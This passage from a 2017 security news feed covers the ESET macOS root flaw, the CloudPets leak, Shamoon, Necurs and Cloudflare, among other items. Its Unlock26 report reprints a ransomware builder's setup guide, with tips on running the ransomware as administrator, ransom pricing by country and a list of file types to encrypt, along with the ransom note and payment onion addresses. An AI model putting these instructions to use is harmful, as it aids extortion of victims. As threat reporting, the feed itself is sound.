“When ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a request to https://edf.eset.com/edf. The esets_daemon service does not validate the web server’s certificate, so a man-in-the-middle can intercept the request and respond using a self-signed HTTPS certificate.” reads the security advisory. “The esets_daemon service parses the response as an XML document, thereby allowing the attacker to supply malformed content and exploit CVE-2016-0718 to achieve arbitrary code execution as root.”
The security duo has also published the Proof of Concept code to exploit the attack.
ESET has promptly fixed the issue in ESET Endpoint Antivirus version 6.4.168.0.
Update your system as soon as possible.
The Singaporean Defence Ministry was hit by a cyber attack, no secrets were exfiltrated
28.2.2017 securityaffairs BigBrothers
The Singaporean Defence Ministry confirmed that threat actors have breached government systems stealing personal information of its employees.
On Tuesday, the Defence Ministry confirmed that unknown hackers have breached government system and have stolen personal information belonging about 850 Singapore national servicemen and employees.
Data accessed by hackers includes telephone numbers, dates of birth, and national ID numbers.
According to the Singaporean Defence Ministry the hackers were searching for official secrets.
The Singaporean Defence Ministry discovered the security breach this month, the hackers penetrated the I-net system that provides Internet access to national servicemen and employees for their personal communications or Internet surfing.
I-net computer terminals are used in both MINDEF and Singapore Armed Forces (SAF) camps and premises. The nature of the attack suggests investigators the attackers are politically motivated.
According to the ministry, the hackers haven’t exfiltrated classified military information because it is not accessible from the I-net.
“Classified matters in MINDEF/SAF use a different computer system with more stringent security features and are not connected to the Internet,” the official statement published on its website stated.
“The attack on I-net appeared to be targeted and carefully planned,” it said.
“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” MINDEF added.
“We will continually strengthen our cyber defenses as the level of targeted attacks is expected to continue and rise,”
The ministry told the Cyber Security Agency and the Government Technology Agency to extend the investigation to other government systems, fortunately, at the time I was writing no other security breach had been discovered by the experts.
In middle 2015, the Government of Singapore announced the separation of civil servants’ work computers from the Internet in order to secure Government networks. The measure was aimed at preventing cyber attacks that could inject malware into the government email network.
The local news agency The Straits Times reported that the measure impacted some 100,000 computers.
Even before the announcement a number of ministries in Singapore, including the defence and the foreign affairs ministries, had been using separate systems to access the Internet.
Singaporean Defence Ministry
The Government and national infrastructure are a privileged target of hackers, in 2014 a section of the prime minister’s website, as well the website of the presidential residence were targeted by unknown attackers.
In December 2015, experts at FireEye discovered a stealthy botnet relying on a backdoor called LATENTBOT that compromised companies around, including Singapore. In January, a new variant of the infamous Tinba banking trojan has emerged in the wild and targeted financial institutions in the Asia Pacific region, including Singapore.
70+ Cyber Security Micro-Courses and Certifications To Boost Your IT Career
28.2.2017 thehackernews Cyber
With the evolving hacking events around us, cyber-security skills are in high demand across all organizations and industries, because a shortage of skilled cyber security practitioners could leave an organization vulnerable to cyber attacks.
But knowledge alone is not sufficient, 'certification as eligibility' also matters, which shows employers that you are serious about your career and eligible as you have demonstrated your technical ability in some form.
I frequently receive emails and messages from my readers asking: Should I get certified?, Are certifications important to build up a career in IT?, What certifications can one get to start a career in information security? and more.
These are some of the most frequent queries I came across, and in this article, I will attempt to answer these along with a solution on how to get started.
Whether you are looking to launch your career in the IT industry, or perhaps get promoted at your current job — getting certified is a great way to market yourself.
Certifications play a major role in any industry, as almost every organization hires IT professionals with practical knowledge as well as professional certifications which provide a measurement of your skills and knowledge.
This is why it's important to earn certificates in your field.
Cyber Security Micro Courses and Certifications
Cybrary, one of the most popular and highly rated free online IT and Cyber Security Training company, has recently launched around 80 Cyber Security Micro Courses and Certifications in an effort to combat the global shortage of talent in the cyber security profession.
Created by the Cybrary Education Committee, all Micro Courses and Certifications are categorized into Beginner, Intermediate and Advanced levels, giving users thorough deep dive into the most critical skills in the field.
Usually one has to pay thousands of dollars for classes and then thousands for certification exams, but the good news is that all Cybrary's Micro Courses are free and Certification exams are conducted online at the cost of just $10 each — with one free retake per exam.
"The Cybrary community is working to make cybersecurity training available to anyone who wants it, anywhere. Training should not be exclusive to those who can afford to pay $5,000 per class. The same applies to certifications," said Ryan Corey, co-founder, Cybrary.
"Certifications are imperative to a cybersecurity career, and it’s important that we provide accessible and affordable education paths that will help reverse the growing need for skilled cybersecurity professionals."
Here's the list of some selected certification courses that grabbed my attention and are important in the IT field:
Cryptography
Network Devices
Software Development Security
Security Architecture Fundamentals
Mobile Device Security Fundamentals
Incident Response & Advanced Forensics
Security Assessment & Testing Certification
Malware Fundamentals Certification Course
Cybrary also provides free practice tests, so that users can test their capabilities and then finally apply for the actual certification exams.
So, go and grab the best certification courses in cyber security and network security that suit your requirements. The Hacker News readers can use code FREESCT1 for your first free certification exam.
Internet-Connected Teddy Bear Leaks Millions Of Voice Messages and Password
28.2.2017 thehackernews Hacking
Every parent should think twice before handing out Internet-connected toys or smart toys to their children, as these creepy toys pose a different sort of danger: privacy and data security risks for kids who play with them.
This same incident was happened over a year ago when Hong Kong toymaker VTech was hacked, which exposed personal details, including snaps of parents and children and chat logs, of about 6.4 million children around the world.
Now, in the latest security failing of the internet-connected smart toys, more than 2 Million voice recordings of children and their parents have been exposed, along with email addresses and passwords for over 820,000 user accounts.
And What's even Worse? The hackers locked this data and held it for Ransom.
California-based Spiral Toys' line of internet-connected stuffed animal toys, CloudPets, which allow children and relatives to send recorded voicemails back and forth, reportedly left the voice messages recorded between parents and children and other personal data to online hackers.
Cloudpets' Data was Held for Ransom
The customer data was left unprotected from 25 December 2016 to 8 January in a publicly available database that wasn't protected by any password or a firewall, according to a blog post published Monday by Troy Hunt, creator of the breach-notification website Have I Been Pwned?.
Hunt said that the exposed data was accessed multiple times by many third parties, including hackers who accessed and stole customer emails and hashed passwords from a CloudPets database.
In fact, in early January, when cyber criminals were actively scanning the Internet for exposed or badly-configured MongoDB databases to delete their data and ultimately hold it for ransom, CloudPets' database was overwritten twice.
Toy Maker was Notified of the Breach Multiple Times
The worst part comes in when any company is notified of some issue, but it doesn't give a shit to protect its customers. Spiral Toys did the same.
The toy maker was allegedly notified four times that its customer data was online and available for anyone to have their hands on — yet the data remained up for almost a week with evidence suggesting that the data was stolen on multiple occasions.
Interestingly, the CloudPets blog hasn't been updated since 2015, and there is not any public notice about the security concerns.
"It is impossible to believe that CloudPets (or mReady, [a Romanian company which Spiral Toys appears to have contracted with to store its database]) did not know that firstly, the databases had been left publicly exposed and secondly, that malicious parties had accessed them," Hunt said.
"Obviously, they have changed the security profile of the system, and you simply could not have overlooked the fact that a ransom had been left. So both the exposed database and intrusion by those demanding the ransom must have been identified yet this story never made the headlines."
While voice recordings were not kept on the open MongoDB databases, Spiral Toys used an open Amazon-hosted service that required no authorization to store the recordings, user profile pictures, children's names, and their relations to parents, relatives, and friends.
This eventually means that anyone with malicious intent could listen to the recordings by only guessing the correct URL.
Affected? How to Check and What to Do?
This incident is perhaps something to be kept in mind the next time you are shopping for the latest internet-connected smart toy for your kid.
If you are a parent holding a CloudPets account, you are advised to check Have I Been Pwned? website, which compiles all the data from breaches and now includes users accounts stolen from Spiral Toys.
If you found your account affected, you should change your password immediately and consider disconnecting the toy from the internet.
You are also advised to change the passwords on any other online accounts for which you are using the same password as for CloudPets account.
Critical Flaw in ESET Antivirus Exposes Mac Users to Remote Hacking
28.2.2017 thehackernews Vulnerebility
What could be more exciting for hackers than exploiting a vulnerability in a widely used software without having to struggle too much?
One such easy-to-exploit, but critical vulnerability has been discovered in ESET's antivirus software that could allow any unauthenticated attackers to remotely execute arbitrary code with root privileges on a Mac system.
The critical security flaw, tracked as CVE-2016-9892, in ESET Endpoint Antivirus 6 for macOS was discovered by Google Security Team's researchers Jason Geffner and Jan Bee at the beginning of November 2016.
As detailed in the full disclosure, all a hacker needs to get root-level remote code execution on a Mac computer is to intercept the ESET antivirus package's connection to its backend servers using a self-signed HTTPS certificate, put himself in as a man-in-the-middle (MITM) attacker, and exploit an XML library flaw.
The actual issue was related to a service named esets_daemon, which runs as root. The service is statically linked with an outdated version of the POCO XML parser library, version 1.4.6p1 released in March 2013.
This POCO version is based on a version of the Expat XML parser library version 2.0.1 from 2007, which is affected by a publicly known XML parsing vulnerability (CVE-2016-0718) that could allow an attacker to execute arbitrary code via malicious XML content.
Now, when esets_daemon sent a request to https://edf.eset.com/edf during activation of the ESET Endpoint Antivirus product, an MITM attacker can intercept the request to deliver a malformed XML document using a self-signed HTTPS certificate.
This event triggers the CVE-2016-0718 flaw that executes the malicious code with root privileges when esets_daemon parsed the XML content.
This attack was possible because the ESET antivirus did not validate the web server's certificate.
Here's what the duo explain:
"Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an outdated XML parsing library and do not perform proper server authentication, allowing for remote unauthenticated attackers to perform arbitrary code execution as root on vulnerable clients."
Now since the hacker controls the connection, they can send malicious content to the Mac computer in order to hijack the XML parser and execute code as root.
The Google researchers have also released the proof-of-concept (PoC) exploit code, which only shows how the ESET antivirus app can be used to cause a crash.
ESET addressed this vulnerability on February 21 by upgrading the POCO parsing library and by configuring its product to verify SSL certificates.
The patch is made available in the release of version 6.4.168.0 of ESET Endpoint Antivirus for macOS. So, make sure your antivirus package is patched up to date.
Multiple Groups Cooperated in Shamoon Attacks: Symantec
27.2.2017 securityweek Virus
The recent attacks involving the notorious disk-wiping malware Shamoon, aka Disttrack, may have been carried out by multiple groups working together under the command of a single entity, Symantec said on Monday.
A total of three Shamoon 2 attack waves were observed recently, including two in November 2016 and one on January 23. The attacks, believed by many to be the work of Iran, targeted organizations in the Persian Gulf, particularly Saudi Arabia.
Experts have identified connections between apparently different threat groups and the Shamoon attacks. First, Symantec reported that an actor tracked by the company as Greenbug may have helped obtain credentials used in the Shamoon operation.
Later, Palo Alto Networks published a report on Magic Hound, a campaign targeted at energy, government and technology sector organizations that are located or have an interest in Saudi Arabia. The operation involved domains and a RAT linked by IBM to Shamoon attacks.
Researchers also found connections between the Magic Hound attacks and two other Iran-linked advanced persistent threat (APT) actors: Charming Kitten (Newscaster) and Rocket Kitten. Symantec tracks the group behind Magic Hound as Timberworm, and SecureWorks has named it COBALT GYPSY.
Symantec said Timberworm apparently facilitated the January 2017 Shamoon attacks. The group, similar to Greenbug, gained access to the targeted organizations’ systems weeks or months before Shamoon was deployed in order to conduct reconnaissance, harvest credentials and establish persistent remote access.
Timberworm used spear-phishing emails and weaponized documents to gain a foothold in each organization’s network. The attacker then leveraged custom malware, hacking tools and legitimate sysadmin applications to achieve its goals. The use of legitimate tools can help avoid detection and makes attribution more difficult.
Both Greenbug and Timberworm penetrated the systems of many organizations – not only in Saudi Arabia – but the Shamoon worm was only deployed against specific targets.
“Timberworm appears to be a much larger operation, infiltrating a much broader range of organizations beyond those affected by the recent Shamoon attacks. Similarly, Greenbug targeted a range of organizations in the Middle East beyond those affected by Shamoon, including companies in the aviation, energy, government, investment, and education sectors,” said Symantec researchers.
“While both groups leveraged two distinct toolsets, their targets, tactics, and procedures align very well and in close proximity to the coordinated wiping events,” they added.
The evidence suggests that the groups worked together and their activities may have been orchestrated by a single entity, experts said.
The Necurs botnet is evolving, now includes a DDoS module
27.2.2017 securityaffairs BotNet
The Necurs botnet is evolving and recently the experts at BitSight’s Anubis Labs discovered that it was improved to launch DDoS attacks.
The Necurs botnet continues to evolve and recently it was used by crooks not only to spread the dreaded Locky ransomware but he was improved to launch DDoS attacks.
According to the researchers BitSight’s Anubis Labs who are monitoring the Necurs botnet, the malware was modified in September to include a module that implements DDoS capabilities and new proxy command-and-control communication features.
The Necurs Botnet is one of the world’s largest malicious architectures, used to spread the dreaded threats, that vanished since June 1.
When it was first spotted earlier 2015, the experts classified the malicious infrastructure as a high-complex and efficient, “a masterpiece of criminality.”
On October 2015, an international joint effort of law enforcement agencies, including the FBI and the NCA, destroyed the botnet, but it resurrected after and was used to mainly spread the Locky ransomware. Experts called it Necurs and confirmed it was the world’s largest botnet.
“Necurs is a modular malware that can be used for many different purposes. What’s new with the sample we found is the addition of a module that adds SOCKS/HTTP proxy and DDoS capabilities to this malware,” explained Tiago Pereira, threat intel researcher with Anubis Labs.
About six months ago, Pereira and his team discovered that besides the usual port 80 communications, a system compromised by the Necurs malware was communicating with a set of IPs through a different port using a different protocol.
The researchers reverse-engineered the malware and discovered what appeared to be a simple SOCKS/HTTP proxy module for communications between the bot and the command-and-control server.
“As we looked at the commands the bot would accept from the C2, we realized that there was an additional command, that would cause the bot to start making HTTP or UDP requests to an arbitrary target in an endless loop, in a way that could only be explained as a DDoS attack,” continues the analysis published by Pereira.
The researchers have no proof that the threat actors in the wild have used the Necurs botnet in DDoS attacks.
“Please notice that we have not seen Necurs being used for DDOS attacks, we simply saw that it has that capability in one of the modules that it has been loading.” reads Pereira.
The bots were used by operators as proxies (HTTP, SOCKSv4 and SOCKSv5 protocols) relaying connections through them in “direct proxy” and “proxy backconnect” modes.
“As a response to the beacon, there are also three types of messages (or commands) sent by the C2 to the bot, that can be distinguished by the msgtype byte in the header:”
Start Proxybackconnect (msgtype 1);
Sleep (msgtype 2);
Start DDOS (msgtype 5) that includes HTTPFlood and UDPFlood modes.
The researcher highlighted that a malicious architecture having the size of the Necurs botnet could be very dangerous because could generate a huge volume of traffic.
“The HTTP attack works by starting 16 threads that perform an endless loop of HTTP requests… The UDP flood attack works by repeatedly sending a random payload with size between 128 and 1024 bytes,” reads the report.
New Unlock26 Ransomware and RaaS Portal Discovered
27.2.2017 securityweek Virus
A recently discovered Ransomware-as-a-Service (RaaS) portal was found to be responsible for the distribution of a brand new ransomware family dubbed Unlock26.
Dubbed Dot-Ransomware, the RaaS portal went live on February 19, and security researchers suggest that the Unlock26 ransomware was released the same day. Further, they reveal that the ransomware operation features a very minimal and direct style, with few instructions and simple ransom notes and payment portal.
Wannabe criminals registering for the service get to download two files, one being a benign ransomware payload dubbed core.exe, while the other being an archive containing the builder and usage instructions called builder.zip.
The builder, BleepingComputer reports, is a minimal command-line interface through which affiliates can customize the ransom amount (can even set special decryption prices per country), the targeted file types, the type of encryption (full or first 4MB of each file), and the Bitcoin address where the payment should be sent.
To apply the custom settings to the ransomware, affiliates only need to load the core.exe file in the builder, which will also generate a fully weaponized binary, ready for distribution. From this point onward, it’s up to each affiliate to distribute the malicious file using whatever means necessary.
Dubbed Unlock26, the newly-generated ransomware appends a .locked-[XXX] extension to the encrypted files, where XXX appear to be three random alpha-numeric characters unique for each victim. Once the encryption process has been completed, the malware displays a ransom note that instructs victims to access one of four Tor-to-Web proxy URLs.
A signature hidden in the links displayed by the ransom note allows cybercriminals to distinguish between infected hosts, researchers say. However, this also means that victims have to click on the links, and that typing the visible URLs manually in a browser won't offer access to the payment portal, because the site checks for the presence of those signatures.
The signatures are believed to have been included so that each user would be pointed to a unique Bitcoin address when accessing the portal. The payment site, however, doesn’t provide clear instructions on what victims should do, most probably because the malware authors expect victims to have knowledge of what being infected with ransomware involves.
On the other hand, both the ransom note and the payment site also fail to inform the victims on the amount they have to pay. On the payment site, a math function is listed instead: 6.e-002 BTC. Because of all these and because the builder features an error, researchers suggest that both the ransomware and the RaaS operation are under development, not yet ready to be deployed.
Google Hands Over Email Encryption App to Community
27.2.2017 securityweek Krypto
Google announced last week that it has decided to hand over its E2EMail email encryption app to the community.
The tech giant first announced its End-to-End email encryption project in June 2014 and released its source code a few months later. The goal was to create a Chrome extension that would make it easier for less tech savvy people to encrypt their emails using the OpenPGP standard.
The End-to-End crypto library has been used for several projects, including E2EMail, a Gmail client that runs independently of the normal Gmail interface and allows users to send and receive encrypted emails.
The E2EMail source code has been available on GitHub for the past year and it has received contributions from several security engineers. The search giant has now announced that E2EMail is not a Google product and instead it has become a “fully community-driven open source project.”
Since a long time has passed and a Chrome extension is still not ready for general use, some believe this may actually be Google’s way of saying that it has abandoned the project, especially since no changes have been made to the code in the past months.
On the other hand, Google did say that it is looking forward to working “alongside the community” to integrate E2EMail with other projects, such as the recently announced Key Transparency.
“E2EMail in its current incarnation uses a bare-bones central keyserver for testing, but the recent Key Transparency announcement is crucial to its further evolution,” Google employees said in a blog post. “Key discovery and distribution lie at the heart of the usability challenges that OpenPGP implementations have faced. Key Transparency delivers a solid, scalable, and thus practical solution, replacing the problematic web-of-trust model traditionally used with PGP.”
New RaaS Portal Preparing to Spread Unlock26 Ransomware
27.2.2017 securityweek bleepingcomputer.com Virus
A new Ransomware-as-a-Service (RaaS) portal named Dot-Ransomware is behind the Unlock26 ransomware discovered this past week.
First spotted two days ago, this ransomware operation is quite unique as it features a very minimal and direct style, with little-to-no instructions and simple-designed ransom notes and ransom payment portal.
Based on two messages left on the Dot-Ransomware homepage, this entire operation launched on Sunday, February 19, when the website was set up.
Anyone who registers on the service will be able to download two files. One is titled core.exe, which is the benign ransomware payload, while the
second is builder.zip, an archive containing the builder and usage instructions (embedded in full at the end of the article).
The builder is a minimal CLI tool that allows users to customize the following options:
Ransomware decryption price
Special decryption prices per country
Extensions targeted for encryption
The type of encryption (full or first 4MB of each file)
The Bitcoin address where to send the crook's 50% cut
According to the builder's instructions file, users must load the core.exe file in the builder, which will then patch the file with the user's custom settings, and generate a fully weaponized binary, ready for distribution.
The way each Dot-Ransomware user spreads this file is up to him. This may be malvertising, spam, or manual infections after brute-forcing RDP connections.
Unlock26 infection process
On the victim's side, the newly-generated Unlock26 ransomware will encrypt the user's files based on the internal configuration file, and append each locked file with a .locked-[XXX] extension, where XXX appear to be three random alpha-numeric characters unique for each victim.
The last step in the infection process is to show the ransom note, which is simple and to the point, urging users to access one of four Tor-to-Web proxy URLs.
The first eight characters of the ransomware's payment site is also from where the ransomware's name came from, before researchers discovered and linked the ransomware with the Dot-Ransomware RaaS.
The links in the Unlock26 ransom note also hide a signature that allows crooks to distinguish between infected hosts.
This means you have to click on the links from the ransom note itself. Typing the visible URLs manually in a browser won't let you access the payment site, which checks for the presence of these signatures. We suspect the signatures are most likely used to display unique Bitcoin addresses for each user accessing the payment site.
Accessing the Unlock26 payment site we find the same simplistic style, lacking any kind of meaningful instructions.
From our analysis of this entire operation, it's like the ransomware author is expecting everyone to know what to do, as if everyone gets infected with ransomware on a daily basis, and all users are tech-savvy PC veterans that know exactly what should happen next.
Unlock26 ransom payment site
Dot-Ransomware, Unlock26 appear to be under development
But user instructions are not the only things missing from Dot-Ransomware and Unlock26.
For example, if users wanted to pay, they wouldn't even know the amount of Bitcoin they'd need to send, since the Unlock26 payment site doesn't list the decryption price, but shows a math function instead: 6.e-002 BTC. This is weird, to say the least, unless you really want people not to pay the ransom.
Putting this detail together with the error seen in one section of the builder (screenshot above), and with the fact that no users have reported Unlock26 infections as of now, we can say safely say this ransomware and its RaaS are still under development, and not yet ready to be deployed. Let's hope its author gets bored in a few days and drops the service entirely, but we doubt it will happen after working so hard to reach this advanced stage of development.
Special thanks to MalwareHunter, who discovered the Unlock26 ransomware, David Montenegro, who discovered the Dot-Ransomware RaaS, Bleeping Computer's Lawrence Abrams and GrujaRS, who helped with the analysis and info gathering.
IOCs
core.exe SHA256 hash:
db43d7c41da0223ada39d4f9e883611e733652194c347c78efcc439fde6dde1c
builder.zip SHA256 hash:
dd03307aa51cfb1c5a3c3fafc65729ad5b50a764354ef3919b7f9d0b4c6142a5
Ransom note:
Your data was locked!
To unlock your data follow the instructions below
Go to one of this sites
unlock26ozqwoyfv.onion.to
unlock26ozqwoyfv.onion.nu
unlock26ozqwoyfv.onion.casa
unlock26ozqwoyfv.hiddenservice.net
Builder 'Setup Guide.txt' file
================================================================================
====================================================
DotRansomware Setup Guide
====================================================
================================================================================
Attention!!!
We recommend you to build your ransomware inside virtual machine!
(But it is safe to use builder on your PC, just don't run builded exe file on your PC!)
================================================================================
Recommendation:
If you have got possibility to run ransomware on victim's computer with
administrator privileges then do it. Because it will provide better conversion.
================================================================================
Recommended decryption price:
0.1
================================================================================
Recommended special decryption prices:
FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|
0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2
================================================================================
Recommended attacked extensions:
001|1dc|3ds|3fr|7z|a3s|acb|acbl|accdb|act|ai|ai3|ai4|ai5|ai6|ai7|ai8|aia|aif|aiff|aip|ait|anim|apk|arch00|ari|art|arw|
asc|ase|asef|asp|aspx|asset|avi|bar|bak|bay|bc6|bc7|bgeo|big|bik|bkf|bkp|blob|bmp|bsa|c|c4d|cap|cas|catpart|catproduct|
cdr|cef|cer|cfr|cgm|cha|chr|cld|clx|cpp|cr2|crt|crw|cs|css|csv|cxx|d3dbsp|das|dayzprofile|dazip|db|db0|dbf|
dbfv|dcr|dcs|der|desc|dib|dlc|dle|dlv|dlv3|dlv4|dmp|dng|doc|docm|docx|drf|dvi|dvr|dwf|dwg|dxf|dxg|eip|emf|emz|
epf|epk|eps|eps2|eps3|epsf|epsp|erf|esm|fbx|ff|fff|fh10|fh11|fh7|fh8|fh9|fig|flt|flv|fmod|forge|fos|fpk|fsh|ft8|fxg|gdb|
ge2|geo|gho|h|hip|hipnc|hkdb|hkx|hplg|hpp|hvpl|hxx|iam|ibank|icb|icxs|idea|iff|iiq|indd|ipt|iros|irs|itdb|itl|itm|iwd|iwi|j2k|
java|jp2|jpe|jpeg|jpf|jpg|jpx|js|k25|kdb|kdc|kf|kys|layout|lbf|lex|litemod|lrf|ltx|lvl|m|m2|m2t|m2ts|m3u|m4a|m4v|ma|map|
mat|mb|mcfi|mcfp|mcgame|mcmeta|mdb|mdbackup|mdc|mddata|mdf|mdl|mdlp|mef|mel|menu|mkv|mll|mlx|mn|model|mos|mp|
mp4|mpqge|mrw|mrwref|mts|mu|mxf|nb|ncf|nef|nrw|ntl|obm|ocdc|odb|odc|odm|odp|ods|odt|omeg|orf|ott|p12|p7b|p7c|
pak|pct|pcx|pdd|pdf|pef|pem|pfx|php|php4|php5|pic|picnc|pkpass|png|ppd|ppt|pptm|pptx|prj|prt|prtl|ps|psb|psd|psf|psid|
psk|psq|pst|ptl|ptx|pwl|pxn|pxr|py|qdf|qic|r3d|raa|raf|rar|raw|rb|re4|rgss3a|rim|rofl|rtf|rtg|rvt|rw2|rwl|rwz|sav|sb|sbx|
sc2save|shp|sid|sidd|sidn|sie|sis|skl|skp|sldasm|sldprt|slm|slx|slxp|snx|soft|sqlite|sqlite3|sr2|srf|srw|step|stl|stp|sum|svg|
svgz|swatch|syncdb|t12|t13|tax|tex|tga|tif|tiff|tor|txt|unity3d|uof|uos|upk|vda|vdf|vfl|vfs0|vpk|vpp_pc|vst|vtf|w3x|wb2|
wdx|wma|wmo|wmv|wallet|ycbcra|wotreplay|wpd|wps|x3f|xf|xl|xlk|xls|xlsb|xlsm|xlsx|xvc|xvz|xxx|zdct|zip|ztmp|py|rb|
tar|gz|sdf|yuv|max|wav|dat
================================================================================
Recommendation:
You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core!
================================================================================
Links to website:
dot2cgpiwzpmwtuh.onion.to
dot2cgpiwzpmwtuh.onion.nu
dot2cgpiwzpmwtuh.hiddenservice.net
dot2cgpiwzpmwtuh.onion.casa
dot2cgpiwzpmwtuh.onion
Stolen EHR data is flooding criminal underground communities in the Deep Web
27.2.2017 securityaffairs Crime
EHR data are precious commodities in the cyber criminal underground because of the lack of cyber security of healthcare industry.
Electronic health record databases are becoming the most precious commodities in the cyber criminal underground.
The healthcare sector has been the industry with the highest number of data breaches in 2015 when a total of 113.2 million healthcare-related records were stolen by hackers.
Huge lots of electronic health record (EHR), medical insurance identification archives, medical profiles represent a lucrative business for crooks.
An electronic health record (EHR) is a digital version of a patient’s medical record.
A report recently published by TrendMicro TrendLabs states that a complete EHR database could be sold as much as $500,000 on the Deep Web.
It is quite easy to find also smaller caches of farmed medical identities, personal medical profiles, and medical insurance ID card information in the principal black markets in the dark web.
Cybercriminals are exploiting the lax of security implemented for EHR systems.
“Given the contents of an EHR and its capacity to hold financial and credit card records, healthcare organizations become targets of cybercriminals who aim to steal personal identifiable information (PII), as well as financial information.” reads the report titled “Cybercrime and Other Threats Faced by the Healthcare Industry” “But unlike other data breaches, cybercriminals have found more ways to use information from EHRs aside from selling the data in bulk in underground markets”
The researchers have analyzed the offer on the Deep Web in the attempt to profile the offer and understand pricing models used by the criminals focused on the sale of EHR data.
Giving a look at EHR data, Medical insurance IDs with valid prescriptions go for $0.50 US, while complete profiles of US citizens including medical and health insurance data were selling for under $1.
As we said EHR data are a profitable business for cyber criminals, fraudulent tax returns based on stolen medical records go for $13.50 and fake birth certificates based on data stolen from medical records were selling for $500.
“In the last two years the number of cybercriminals committing tax fraud, through the use of stolen personal data found in EHRs, increased.19 As a result, Turbo Tax–a program used for filing taxes in the U.S.–had to temporarily suspend state tax filings to investigate the increasing number of fraud cases. ” continues the report.
Identity theft is one of the main fraudulent activities conducted by cyber criminals that can use the EHR data to accredit ththemselves gainst multiple webservices.
“In terms of resolving fraud issues, credit cards breaches have financial liability limited to US$50 per card. In the health industry, however, 65% of victims of medical identity theft had to pay an average of US$13,500 to resolve the crime–with costs covering the services of creditors and legal counsel.” reads the report. “Credit cards can be easily canceled and replaced but health care data such as Social Security numbers, and birthdates, are permanent–which means the data will live forever and that cyber criminals may reuse such information for a variety of purposes”
Crooks can use data stolen from medical records to obtain and sell copies of real birth certificates. In the following figure is reported an advertisement for birth certificates published on AlphaBay starting at US$500 per person.
The situation is worrisome, healthcare organizations are failing to protec their key assets.
It is quite easy for hackers to find EHR systems exposed online with a poor security, search engines like Shodan could provide detailed information on these systems, healthcare facilities, medical equipment.
The TrendLabs report detailed research conducted through Shodan that demonstrated the existence of many systems managing EHR data that were left open to the Internet with poor security.
Enjoy the report.
Kdyby účty neměly správcovská oprávnění, skrze 93 % nalezených děr ve Windows 10 by se nedalo úspěšně útočit
27.2.2017 cnews.cz Zranitelnosti
Díry byly, jsou a budou. Zabezpečení by ale výrazně prospělo, kdybychom nepoužívali uživatelské účty se zbytečně vysokými oprávněními. Aspoň díry nalezené v loňském roce ve Windows na správcovská oprávnění opravdu doplácí.
Používání práv správce bylo vždycky kritizováno v případech, kdy práva uživatel či uživatelka reálně nepotřebuje. Pakliže je účet se zvýšenými právy napaden, může takový útok způsobit pěknou paseku v počítači. Jenže historie ukázala, že koncept oprávnění je patrně příliš složitý. Ve skutečnosti většinu lidí nezajímá, jakými právy disponují, resp. reptají, když pocítí omezení účtu bez správcovských práv.
Vysoká oprávnění znamenají náchylnost k úspěšným útokům
Že by ale bezpečnosti prospělo, kdyby se vysoké oprávnění nepoužívalo zbytečně často, potvrzuje bezpečnostní firma Avecto. Ta ve svém výzkumu provedla analýzu bezpečnostních výstrah, které Microsoft v roce 2016 zveřejnil. Nahlášeno bylo 530 zranitelných míst v produktech redmondského giganta, přičemž 36 % z nich bylo označeno za kritické. Za velice důležité zjištění považuji, že by tyto díry z velké části nemusely znamenat problém.
V 94 % případů ze všech kritických zranitelných míst by mohlo být úspěšnému útoku předejito, kdyby uživatelský účet neměl nastavena správcovská práva. Loni to podle firmy platilo pro 85 % kritických děr. Tím spíše je nutné doporučit, abychom nepoužívali účty se zvýšeným oprávněním, pokud to není nezbytně nutné, protože tím výrazně zvyšujeme šanci úspěšného útoku na naše počítače. Bylo by také dobré vědět, jak správcovská oprávnění ovlivňují nekritická místa v zabezpečení s nižším hodnocením závažnosti. To bohužel Avecto neuvedlo.
Pokud je to možné, používejte raději běžný typ účtu
Edge a Windows 10
Patrně ještě zajímavější je zjištění, že 100 % všech objevených zranitelných míst v Edgi či Internet Exploreru, tedy nejen těch kritických, k úspěšnému útoku vyžaduje správcovská oprávnění. Běžné účty by tak loni skrze uvedené prohlížeče nebylo možné napadnout ani v jednom případě.
Konkrétně ve Windows 10 bylo za celý rok nahlášeno 395 zranitelných míst, což je o 46 % více než v případě Windows 8 a Windows 8.1. (Obě verze Osmiček obsahovaly 265 děr.) To dává smysl, protože Osmičky jsou starší a více odladěné, na trhu se pak současně nachází více verzí Desítek a vzhledem k neustálému vývoji bude v Desítkách zkrátka počet objevených zranitelných míst vždycky vyšší než v případě roky ustáleného kódu.
Loňské útoky na Edge by nebyly ničivé, kdyby byly používány standardní účty
Důležitější je, jak se firma s dírami vypořádá. Nás v tuto chvíli ale více zajímá zjištění podobné dvěma výsledkům výše. Pro 93 % nalezených děr ve Windows 10 platí, že by útok skrze tyto díry nebyl úspěšný, kdyby uživatelské účty nedisponovaly správcovským oprávněním. Opět se správcovské oprávnění ukazuje jako koulí u nohy, aspoň z pohledu bezpečnostních expertek a expertů.
Avecto se podívalo také na Office, kde však uvedlo jen základní statistiku. V produktech rodiny Office bylo loni nahlášeno 79 zranitelných míst. Před rokem to bylo 62 a oproti roku 2014 to představuje již 295% nárůst. Opět předpokládám, že za to může dynamický vývoj Office dostupného v rámci předplatného Office 365. Nevíme však, kolik děr je závislých na účtech se správcovými oprávněními.
Cloudbleed: únik dat sdíleného proxy serveru
27.2.2017 Root.cz Zranitelnosti
Společnost Cloudflare oznámila chybu ve své infrastruktuře, jejíž následky jsou velmi podobné zranitelnosti Heartbleed v OpenSSL. Díky podrobné zprávě o incidentu si můžeme přečíst, co se přesně stalo.
Začalo to celé nenápadně, v pátek 17. února odpoledne, kdy bezpečnostní výzkumník z Google, Tavis Ormandy, napsal na Twitter status, který předznamenával něco velkého.
Během analýzy výsledků tzv. fuzzingu, tedy testování kódu velkou množinou různých vstupů, narazil na podivný webový obsah, který obsahoval evidentně kusy neinicializované paměti. Záhy se ukázalo, že problém je v proxy serverech služby Cloudflare. Když se mu ho podařilo izolovat a reprodukovat, snažil se jej co nejrychleji předat bezpečnostnímu týmu Cloudflare.
Tavis Ormandy
Ukázka uniklých dat – data známé aplikace Uber
První pomoc
